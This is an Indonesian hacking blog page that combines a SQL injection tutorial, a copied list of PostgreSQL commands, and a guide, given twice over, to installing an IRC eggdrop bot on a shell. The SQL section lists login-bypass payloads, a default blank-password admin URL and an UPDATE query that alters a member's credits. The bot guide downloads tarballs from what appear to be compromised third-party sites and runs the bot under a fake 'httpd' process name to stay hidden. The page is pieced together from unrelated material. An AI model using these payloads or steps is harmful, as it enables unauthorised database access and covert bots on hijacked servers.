SQL Injection attack merupakan salah satu teknik dalam melakukan web hacking utk menggapai akses pada sistem database yg berbasis SQL. Teknik ini memanfaatkan kelemahan dalam bahasa pemprograman scripting pada SQL dalam mengolah suatu sistem database. Hasil yg ditimbulkan dari teknik ini membawa masalah yg sangat serius. Mengapa disebut SQL Injection ? seperti yg kita ketahui, injection jika diartikan ke dalam bahasa Indonesia yaitu "suntikan". Yang terjadi memang seperti melakukan suntikan terhadap SQL yg tujuannya adalah tergantung kepada pelakunya dan pada intinya jika disalahgunakan maka akan membawa aspek negatif terhadap korban.
Sudah disinggung diatas bahwa SQL Injection attack memanfaatkan kelemahan dalam bahasa pemprograman scripting pada SQL maksudnya adalah memanfaatkan teknik string building untuk mengeksekusi/menjalankan kode SQL. Jadi prinsip dasar SQL Injection sebenarnya memanfaatkan kode insecure (tidak aman) atas sebuah sistem yg terhubung ke internet dalam upaya melangkahi command (perintah) dan secara langsung menuju ke database untuk kemudian mengambil keuntungan dari sistem yg dijamin aman untuk melakukan pengambilan atau pengubahan atau lain sebagainya oleh penyerang.
Keuntungan yg diambil adalah seperti login akses terhadap server yg bukan haknya atau yg lainnya, tergantung kepada penyerangnya.
Input Query String
Default setting dari SQL menggunakan :
adminID = sa
password ='' (kosong atau blank)
misalnya : http://www.target.com/login.asp?adminID=sa%20password=''
%20 artinya menggantikan "jarak spasi"
Ini merupakan kondisi yg berbahaya jika pengubahan setting tidak segera dilakukan.
Verifikasi yg dilakukan oleh SQL disaat pemakai memasukkan username dan password adalah seperti yg terlihat pada teks sebagai berikut :
SQLQuery="SELECT Username FROM Users WHERE Username="'&strUsername&"'strpassword&"'
Pada verifikasi terdapat kelemahan pada pemprosesan pada string2 tertentu yg sebenarnya string tersebut dapat dikatakan sebagai input ilegal. Verifikasi tetap melakukan proses dan nantinya menghasilkan error page. Error page tersebut justru membuka rahasia struktur database dan bahkan error page tetapi eksekusi terhadap validasi input tetap dijalankan.
Contoh : menggunakan injection string 'OR''= pada username maupun password baik dilakukan dgn metode URL input query string maupun Box input query string maka SQL query akan membacanya sebagai berikut :
SELECT Username FROM Users WHERE Username=''OR''='' AND Password=''OR''=''
Maka yg terjadi adalah SQL query akan menyatakan blank username dan blank password sebagai user yg sah (valid). SQL Injection yg berhasil dilakukan akan ditandai dgn munculnya error page dgn error yg dimunculkan dapat berupa ODBC error, internal server error, syntax error dan lain sebagainya.
Ada banyak variasi dari injection string yg dapat digunakan untuk melakukan SQL Injection :
'or 1=1--
'or 0=0 --
'or 'x'='x
'or a=a-
"or 0=0 --
"or 0=0 #
"or "x"="x
")or("a"="a
admin'--
hi" or 1=1 --
hi' or'a'='a
hi")or("a"="a
or 0=0 #
'or a=a--
'or 0=0 #
'having 1=1--
"or 1=1--
"or "a"="a
')or('a'='a
')or('x'='x
hi" or "a"="a
hi' or 1=1 --
hi')or('a'='a
or 0=0 --
or 1=1--
Serangan dgn menggunakan SQL Injection dapat lebih bervariasi lagi dan itu tergantung kepada situasi dan tujuan dari serangan yg dilakukan oleh penyerang. Contoh :
'UPDATE YEPCell_memberDB set Credits=100 wher UserID='yamakasi'
SQl Injection yg dilakukan seseorg dapat dideteksi dgn menggunakan IDS (Intrusion Detection System). IDS bukan lagi tool yg terlalu asing terdengar ditelinga anda. Anda dapat mencarinya di www.google.com
Sumber : http://www.jambihackerlink.tk/
SQL Commands Yang Umum Digunakan
Berikut adalah beberapa SQL Commands yang umum, disini saya tidak akan memandu anda bagaimana cara penggunaan dari Command tersebut...jadi jangan pernah bertanya kepada saya bagaimana command tersebut digunakan.......sikap bijaksana yang harus anda ambil adalah dengan bertanya kepada paman google....karena dengannya akan terkuak jawaban dari pertanyaan anda..........
Berikut ini Commandnya:
ABORT -- abort the current transaction
ALTER DATABASE -- change a database
ALTER GROUP -- add users to a group or remove users from a group
ALTER TABLE -- change the definition of a table
ALTER TRIGGER -- change the definition of a trigger
ALTER USER -- change a database user account
ANALYZE -- collect statistics about a database
BEGIN -- start a transaction block
CHECKPOINT -- force a transaction log checkpoint
CLOSE -- close a cursor
CLUSTER -- cluster a table according to an index
COMMENT -- define or change the comment of an object
COMMIT -- commit the current transaction
COPY -- copy data between files and tables
CREATE AGGREGATE -- define a new aggregate function
CREATE CAST -- define a user-defined cast
CREATE CONSTRAINT TRIGGER -- define a new constraint trigger
CREATE CONVERSION -- define a user-defined conversion
CREATE DATABASE -- create a new database
CREATE DOMAIN -- define a new domain
CREATE FUNCTION -- define a new function
CREATE GROUP -- define a new user group
CREATE INDEX -- define a new index
CREATE LANGUAGE -- define a new procedural language
CREATE OPERATOR -- define a new operator
CREATE OPERATOR CLASS -- define a new operator class for indexes
CREATE RULE -- define a new rewrite rule
CREATE SCHEMA -- define a new schema
CREATE SEQUENCE -- define a new sequence generator
CREATE TABLE -- define a new table
CREATE TABLE AS -- create a new table from the results of a query
CREATE TRIGGER -- define a new trigger
CREATE TYPE -- define a new data type
CREATE USER -- define a new database user account
CREATE VIEW -- define a new view
DEALLOCATE -- remove a prepared query
DECLARE -- define a cursor
DELETE -- delete rows of a table
DROP AGGREGATE -- remove a user-defined aggregate function
DROP CAST -- remove a user-defined cast
DROP CONVERSION -- remove a user-defined conversion
DROP DATABASE -- remove a database
DROP DOMAIN -- remove a user-defined domain
DROP FUNCTION -- remove a user-defined function
DROP GROUP -- remove a user group
DROP INDEX -- remove an index
DROP LANGUAGE -- remove a user-defined procedural language
DROP OPERATOR -- remove a user-defined operator
DROP OPERATOR CLASS -- remove a user-defined operator class
DROP RULE -- remove a rewrite rule
DROP SCHEMA -- remove a schema
DROP SEQUENCE -- remove a sequence
DROP TABLE -- remove a table
DROP TRIGGER -- remove a trigger
DROP TYPE -- remove a user-defined data type
DROP USER -- remove a database user account
DROP VIEW -- remove a view
END -- commit the current transaction
EXECUTE -- execute a prepared query
EXPLAIN -- show the execution plan of a statement
FETCH -- retrieve rows from a table using a cursor
GRANT -- define access privileges
INSERT -- create new rows in a table
LISTEN -- listen for a notification
LOAD -- load or reload a shared library file
LOCK -- explicitly lock a table
MOVE -- position a cursor on a specified row of a table
NOTIFY -- generate a notification
PREPARE -- create a prepared query
REINDEX -- rebuild corrupted indexes
RESET -- restore the value of a run-time parameter to a default value
REVOKE -- remove access privileges
ROLLBACK -- abort the current transaction
SELECT -- retrieve rows from a table or view
SELECT INTO -- create a new table from the results of a query
SET -- change a run-time parameter
SET CONSTRAINTS -- set the constraint mode of the current transaction
SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session
SET TRANSACTION -- set the characteristics of the current transaction
SHOW -- show the value of a run-time parameter
START TRANSACTION -- start a transaction block
TRUNCATE -- empty a table
UNLISTEN -- stop listening for a notification
UPDATE -- update rows of a table
VACUUM -- garbage-collect and optionally analyze a database
NB: BOT Ini akan otomatis jalan pada server dalnet ” Husus Untuk dalnet server “
1. wget brendanspaar.com/modules/coppermine/albums/kinabot.tar.gz
atau brendanspaar.com/modules/coppermine/albums/kinabot.tar.bz2 <–untuk tambahan creat.tcl
2. tar -zvxf kinabot.tar.gz untuk kinabot.tar.gz
tar -jxvf kinabot.tar.bz2 untuk kinabot.tar.bz2
3. cd .kin
4. ./creat fileconf nick ident IP channel owner
contoh: ./creat defaced s4nd4l_j3p1t s4nd4l 212.88.174.3 defaced g4ptek
defaced……………….. file conf yg akan dibuat (akan terbuat dgn sendirinya)
s4nd4l_j3p1t ……………nick bot
s4nd4l ……………….ident bot
212.88.174.3 …….IP shell
defaced ………………… nama channel, jangan pake #
g4ptek ……………. nick owner
catatan: bila nick mengandung karakter yg gak biasa mis: ` maka sebelum karakter tsb tambahkan tanda \ (backslash)
contoh: mich`keren -> mich\`keren
5. ./eggdrop -m fileconf
atau ./run fileconf fakename
fakename dapat dilihat dgn perintah ps x, cari aja proses yg paling banyak terlihat
contoh ./run a.txt /usr/local/apache/bin/httpd ( /usr/local/apache/bin/httpd = fake namenya)
Udah deh! tunggu aja di channel, ato whois aja nicknya.
Bila ingin tambahkan tcl lain seperti creat.tcl:
2. ./tcl -t fileconf creat.tcl
contoh: ./tcl -t a creat.tcl ( lihat keterangan dengan perintah ./tcl )
untuk penggunaan bisa diliat dengan command/perintah !creat dichannel
Cara Mudah Untuk membuat BOT II
wget http://geocities.com/g4ptek/tools/bot.tar.gz
tar -zxvf bot.tar.gz
rm -rf bot.tar.gz
cd .share
# download bot.txt ke kompi lalu edit settingnya sesuai kebutuhan, kemudian upload lagi
# contoh: http://verzekering.it/voorwaarden/.conf/scripts/bot4.txt
# klo mau nambah tcl masuk ke folder .share/scripts/ download semua tcl yg perlu dr http://verzekering.it/voorwaarden/.conf/scripts/ dan tambahkan kedalam folder .share/scripts/
# klo pengen tcl-nya jalan jgn lupa tambahkan ke file /.share/bot.txt (bagian paling bawah) terus upload lagi
./shade “httpd” ./eggdrop -m bot.txt
# usage:
# pv bot kamu di channel
# /msg nick-bot-kamu auth
# /msg nick-bot-kamu pass
# /msg nick-bot-kamu auth
Selamat BikiN Bot….
1. wget brendanspaar.com/modules/coppermine/albums/kinabot.tar.gz
atau brendanspaar.com/modules/coppermine/albums/kinabot.tar.bz2 <–untuk tambahan creat.tcl
2. tar -zvxf kinabot.tar.gz untuk kinabot.tar.gz
tar -jxvf kinabot.tar.bz2 untuk kinabot.tar.bz2
3. cd .kin
4. ./creat fileconf nick ident IP channel owner
contoh: ./creat defaced s4nd4l_j3p1t s4nd4l 212.88.174.3 defaced g4ptek
defaced……………….. file conf yg akan dibuat (akan terbuat dgn sendirinya)
s4nd4l_j3p1t ……………nick bot
s4nd4l ……………….ident bot
212.88.174.3 …….IP shell
defaced ………………… nama channel, jangan pake #
g4ptek ……………. nick owner
catatan: bila nick mengandung karakter yg gak biasa mis: ` maka sebelum karakter tsb tambahkan tanda \ (backslash)
contoh: mich`keren -> mich\`keren
5. ./eggdrop -m fileconf
atau ./run fileconf fakename
fakename dapat dilihat dgn perintah ps x, cari aja proses yg paling banyak terlihat
contoh ./run a.txt /usr/local/apache/bin/httpd ( /usr/local/apache/bin/httpd = fake namenya)
Udah deh! tunggu aja di channel, ato whois aja nicknya.
Bila ingin tambahkan tcl lain seperti creat.tcl
2. ./tcl -t fileconf creat.tcl
contoh: ./tcl -t a creat.tcl ( lihat keterangan dengan perintah ./tcl )
untuk penggunaan bisa diliat dengan command/perintah !creat dichannel
Cara Mudah Untuk membuat BOT II
wget http://geocities.com/g4ptek/tools/bot.tar.gz
tar -zxvf bot.tar.gz
rm -rf bot.tar.gz
cd .share
# download bot.txt ke kompi lalu edit settingnya sesuai kebutuhan, kemudian upload lagi
# contoh: http://verzekering.it/voorwaarden/.conf/scripts/bot4.txt
# klo mau nambah tcl masuk ke folder .share/scripts/ download semua tcl yg perlu dr http://verzekering.it/voorwaarden/.conf/scripts/ dan tambahkan kedalam folder .share/scripts/
# klo pengen tcl-nya jalan jgn lupa tambahkan ke file /.share/bot.txt (bagian paling bawah) terus upload lagi
./shade “httpd” ./eggdrop -m bot.txt
# usage:
# pv bot kamu di channel
# /msg nick-bot-kamu auth
# /msg nick-bot-kamu pass
# /msg nick-bot-kamu auth
Selamat BikiN Bot….
Langganan:
Postingan (Atom)